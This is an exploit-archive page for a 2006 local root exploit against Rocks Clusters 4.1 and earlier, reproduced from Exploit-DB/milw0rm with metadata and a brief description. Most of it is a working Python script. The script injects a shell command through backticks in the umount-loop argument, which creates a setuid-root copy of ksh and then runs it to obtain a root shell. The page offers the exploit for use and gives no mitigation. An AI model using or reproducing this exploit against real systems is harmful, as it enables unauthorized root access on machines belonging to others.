Rocks Clusters - exploit.company

vendor:

N/A

by:

xavier@tigerteam.se

7,2

CVSS

HIGH

Local Root Exploit

N/A

CWE

Product Name: N/A

Affected Version From: Rocks Clusters <=4.1

Affected Version To: Rocks Clusters <=4.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Rocks Clusters <=4.1 umount-loop local root exploit

This exploit is a quick and nasty version of the exploit. It makes sure the . is writable and cleans up afterwards. It imports the os module, gets the current working directory, creates a file called x, writes a shell script to it, prints a message, and then runs the umount-loop command with the shell script. Finally, it runs the shell script.

Mitigation:

N/A

Source

Exploit-DB raw data:

#!/usr/bin/env python
##############################################################################
##  rocksumountdirty.py: Rocks release <=4.1 local root exploit
##  quick and nasty version of the exploit. make sure the . is writable and
##  you clean up afterwards. ;)
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)

# milw0rm.com [2006-07-15]